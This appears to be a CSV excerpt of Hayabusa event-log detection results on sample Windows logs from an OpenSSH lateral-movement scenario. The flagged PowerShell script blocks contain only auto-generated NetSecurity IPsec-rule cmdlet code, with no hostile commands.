${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 